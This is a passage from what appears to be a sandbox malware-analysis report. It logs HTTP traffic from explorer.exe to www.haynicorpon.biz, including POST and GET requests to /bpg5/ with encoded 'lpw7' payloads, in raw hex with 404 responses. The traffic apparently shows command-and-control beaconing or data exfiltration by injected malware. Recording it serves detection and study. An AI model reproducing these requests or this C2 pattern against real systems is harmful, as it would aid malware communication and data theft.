4c 76 46 37 57 5a 7a 6f 33 55 77 57 78 37 61 7a 34 73 75 6f 4e 52 4e 71 73 72 50 4d 66 7a 31 44 51 6d 31 6b 6f 58 36 78 48 7e 44 53 41 44 48 66 44 32 68 47 33 38 2d 52 4a 4d 41 61 45 6e 2d 7e 54 59 62 46 71 57 56 4b 6c 4f 4d 76 73 62 6e 78 66 76 37 73 69 6f 76 39 68 58 6b 73 6b 58 66 66 44 59 42 6b 5f 44 57 44 33 37 2d 34 54 6f 44 56 77 38 74 70 64 70 32 47 59 4e 79 35 6e 69 4d 49 44 55 58 72 5f 48 49 30 5a 64 6b 55 41 53 56 59 33 32 6d 53 32 46 7a 6d 74 56 54 39 57 61 76 4d 33 65 4d 4b 4f 58 6b 4a 35 6f 4b 54 59 74 52 6c 76 28 62 61 56 4c 4c 62 62 6d 69 63 57 36 6f 31 76 36 4e 62 45 33 38 38 62 34 71 68 6d 4d 39 66 62 6a 70 66 50 28 66 7e 33 6d 6f 61 4a 49 4b 54 66 54 4b 45 45 7e 58 61 2d 59 55 59 70 68 4f 36 47 58 7a 36 5a 48 76 4a 47 4d 73 58 64 56 79 76 5a 67 2d 73 7a 53 42 48 6e 31 6d 45 54 6d 44 6f 33 63 35 79 50 44 64 79 53 57 2d 75 6e 74 43 6e 61 31 77 33 4c 37 33 51 31 28 77 6f 74 4b 6b 65 48 73 2d 65 65 65 56 55 46 36 75 58 5a 4d 46 6a 79 49 4f 34 43 39 6b 38 67 76 6d 77 45 56 43 79 76 4d 74 39 58 4b 61 4a 49 65 46 36 45 70 4f 37 36 37 51 57 66 34 4b 39 33 35 30 6c 6a 55 46 6f 35 36 75 4d 4c 57 4e 71 72 33 2d 73 59 32 63 30 55 39 5a 33 44 56 4f 6b 6f 4e 73 65 38 70 39 70 63 52 4d 6e 5f 66 55 65 70 68 77 75 59 76 38 31 56 6d 38 75 55 55 76 4d 69 6b 70 45 53 7e 58 6d 46 6b 57 61 63 56 31 42 78 4c 4c 41 6d 4e 57 71 75 4d 77 4e 75 6b 78 67 57 49 79 59 54 4c 6d 38 4f 34 4b 51 6a 6d 30 46 37 4b 69 43 72 38 78 49 4e 36 75 75 76 37 5f 6f 46 66 79 7a 7a 78 70 7e 41 4b 4d 68 63 70 33 35 43 28 6e 32 6d 43 68 72 4c 39 68 76 64 51 64 49 55 6a 2d 75 6f 59 35 6e 31 57 75 72 53 34 39 61 76 41 57 54 36 4a 6f 31 70 56 41 73 33 55 59 68 64 5a 5f 62 2d 72 69 49 46 63 70 70 4d 6d 32 63 6a 58 72 54 42 6d 55 52 4b 5a 6d 52 33 66 5f 73 43 68 42 69 33 74 5a 54 67 69 71 34 4b 61 54 79 7a 76 50 7e 76 48 33 5a 57 6b 52 38 6a 32 42 6f 5a 30 6d 6a 33 39 64 4b 33 68 5f 77 65 66 41 7e 4e 56 56 70 32 32 35 50 31 41 7a 69 55 39 67 53 31 35 63 77 4a 45 5a 67 63 63 4f 45 58 50 65 67 4a 38 38 56 65 6b 6f 49 79 52 68 69 50 49 74 77 4e 6b 52 76 47 48 5f 51 4a 48 64 35 7a 46 6c 45 58 6c 45 41 56 4e 59 49 52 4c 4b 78 32 47 7a 62 38 6f 6b 45 48 57 65 56 76 41 57 71 37 51 38 50 62 61 2d 5a 6f 46 66 49 50 58 62 74 4b 6c 67 35 34 72 56 42 48 4c 6f 35 33 4f 6a 57 61 56 50 66 52 77 57 55 6d 30 33 6f 32 71 61 50 6f 57 5a 75 34 32 48 56 62 52 56 56 4c 50 2d 33 31 68 43 4e 71 61 75 6a 31 55 56 53 4d 77 4e 73 42 51 35 35 68 47 62 30 5f 47 5a 67 39 4a 42 77 42 74 47 56 6d 47 75 30 58 67 36 63 5f 42 63 63 78 5a 75 64 49
                                                  Data Ascii: lpw7=J3NkxvfAm2TL43~0s8XgRDjXT3RuGkgf20IPxw3e~hN_DcNLe5PO6Nr6CZ33qf18L4NuIBPC6-54(KIoeavIDZJXGwk196WC2UXhEATmhuq9oKJtwhZ-Yqm7mXY7quITsn0GXu496LEP4YJ4YyLModx6oqSn8PV6ueqdph3nPcHEAUW7J9Elc5rJpxURtsRL5YggUs9Lf3Y6Ea6wn6jlq09IX634fcH9dCOGr4RwjEM16Xc8SaWCgdSJpn87UNer6qQWcOSQTg6vmWya9lZw9Uuv6SSMVWAoQMcGPH(-kc3nvbRyW5DmuII16XFMxmUcGtPJUklWCOsLEJ(zuZjRkIlDq6d52g4eY-8q92ZrUFF8embMGVR3HAquRGYCII7ODaD_GXVg0NlSc8Ps8-e0LMeVG2FLn2GUr1V6Ma(foRnymwfCcsL-9Yzl7vuGkaDrKsMRUBWv0CJ38IUwE5fMqxxJrMt9PrCYJsd1suh2Nx~TsjMXZqAL282v96Vo9Xfu6y9u9LvF7WZzo3UwWx7az4suoNRNqsrPMfz1DQm1koX6xH~DSADHfD2hG38-RJMAaEn-~TYbFqWVKlOMvsbnxfv7siov9hXkskXffDYBk_DWD37-4ToDVw8tpdp2GYNy5niMIDUXr_HI0ZdkUASVY32mS2FzmtVT9WavM3eMKOXkJ5oKTYtRlv(baVLLbbmicW6o1v6NbE388b4qhmM9fbjpfP(f~3moaJIKTfTKEE~Xa-YUYphO6GXz6ZHvJGMsXdVyvZg-szSBHn1mETmDo3c5yPDdySW-untCna1w3L73Q1(wotKkeHs-eeeVUF6uXZMFjyIO4C9k8gvmwEVCyvMt9XKaJIeF6EpO767QWf4K9350ljUFo56uMLWNqr3-sY2c0U9Z3DVOkoNse8p9pcRMn_fUephwuYv81Vm8uUUvMikpES~XmFkWacV1BxLLAmNWquMwNukxgWIyYTLm8O4KQjm0F7KiCr8xIN6uuv7_oFfyzzxp~AKMhcp35C(n2mChrL9hvdQdIUj-uoY5n1WurS49avAWT6Jo1pVAs3UYhdZ_b-riIFcppMm2cjXrTBmURKZmR3f_sChBi3tZTgiq4KaTyzvP~vH3ZWkR8j2BoZ0mj39dK3h_wefA~NVVp225P1AziU9gS15cwJEZgccOEXPegJ88VekoIyRhiPItwNkRvGH_QJHd5zFlEXlEAVNYIRLKx2Gzb8okEHWeVvAWq7Q8Pba-ZoFfIPXbtKlg54rVBHLo53OjWaVPfRwWUm03o2qaPoWZu42HVbRVVLP-31hCNqauj1UVSMwNsBQ55hGb0_GZg9JBwBtGVmGu0Xg6c_BccxZudIkVvbFx13qi~NParkQaROKYKhG70PkggZxwKrBKa0Gz~WrCG8lhTLVZdN9IIcSMoBFoZhZD4JKepHY8c4mMPVp12TAvsfhONoY4NDI-~2z_KTZj6q6Psw).
                                                  May 25, 2023 11:37:18.634275913 CEST288INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 25 May 2023 09:37:18 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Last-Modified: Fri, 05 Oct 2018 09:13:39 GMT
                                                  ETag: W/"afe-57777afe91410"
                                                  Content-Encoding: gzip
                                                  Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b
                                                  Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r[
                                                  May 25, 2023 11:37:18.634331942 CEST288INData Raw: 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64
                                                  Data Ascii: ,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  14192.168.2.449714183.90.228.4680C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:37:21.143193960 CEST290OUTPOST /bpg5/ HTTP/1.1
                                                  Host: www.haynicorpon.biz
                                                  Connection: close
                                                  Content-Length: 186
                                                  Cache-Control: no-cache
                                                  Origin: http://www.haynicorpon.biz
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Accept: */*
                                                  Referer: http://www.haynicorpon.biz/bpg5/
                                                  Accept-Language: en-US
                                                  Accept-Encoding: gzip, deflate
                                                  Data Raw: 6c 70 77 37 3d 4a 33 4e 6b 78 76 66 41 6d 32 54 4c 34 30 57 30 74 74 58 67 54 6a 6a 58 55 33 52 75 4a 45 67 56 32 30 45 48 78 78 44 4f 7e 57 52 5f 44 4e 39 4c 4c 62 6e 4f 35 4e 72 39 4e 35 32 2d 6b 5f 31 54 4c 34 4e 36 49 44 62 43 36 36 70 34 35 6f 77 6f 59 65 62 50 63 35 4a 43 4e 51 6b 34 39 36 61 68 32 55 4c 71 45 41 37 6d 68 73 7e 39 72 4b 5a 74 32 45 74 2d 4a 4b 6d 48 78 48 59 67 71 75 30 43 73 6e 45 34 58 71 41 39 36 36 49 50 34 6f 70 34 66 6a 4c 4d 39 4e 78 37 77 36 54 79 33 64 45 43 6a 72 37 38 75 69 44 71 4d 70 37 4b 42 31 76 52 4b 77 29 2e 00 00 00 00 00 00 00 00
                                                  Data Ascii: lpw7=J3NkxvfAm2TL40W0ttXgTjjXU3RuJEgV20EHxxDO~WR_DN9LLbnO5Nr9N52-k_1TL4N6IDbC66p45owoYebPc5JCNQk496ah2ULqEA7mhs~9rKZt2Et-JKmHxHYgqu0CsnE4XqA966IP4op4fjLM9Nx7w6Ty3dECjr78uiDqMp7KB1vRKw).
                                                  May 25, 2023 11:37:21.413304090 CEST291INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 25 May 2023 09:37:21 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Last-Modified: Fri, 05 Oct 2018 09:13:39 GMT
                                                  ETag: W/"afe-57777afe91410"
                                                  Content-Encoding: gzip
                                                  Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b
                                                  Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r[
                                                  May 25, 2023 11:37:21.413330078 CEST292INData Raw: 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64
                                                  Data Ascii: ,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  15192.168.2.449715183.90.228.4680C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  May 25, 2023 11:37:23.962760925 CEST292OUTGET /bpg5/?lpw7=E1lEyZmRnD2D+FehgZ3adwfuD0V+JGYoymMHnSTWmThHM+xhQcv29ZH2HKfEtfNOP/hjUin7/rBu/LxtAOfOYIovOzsEyI2Bzg==&UZCu=zJfEuRXw-P HTTP/1.1
                                                  Host: www.haynicorpon.biz
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  May 25, 2023 11:37:24.255688906 CEST294INHTTP/1.1 404 Not Found
                                                  Server: nginx
                                                  Date: Thu, 25 May 2023 09:37:24 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 2814
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Last-Modified: Fri, 05 Oct 2018 09:13:39 GMT
                                                  ETag: "afe-57777afe91410"
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 37 70 78 3b 0a 7d 0a 70 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a
                                                  Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px; margin: 0; padding: 0; color: white;}
                                                  May 25, 2023 11:37:24.255743980 CEST295INData Raw: 2e 65 78 70 6c 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 0a 20 20 20 20
                                                  Data Ascii: .explain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li { color: #666;}h3 { letter-spacing: 1px; f
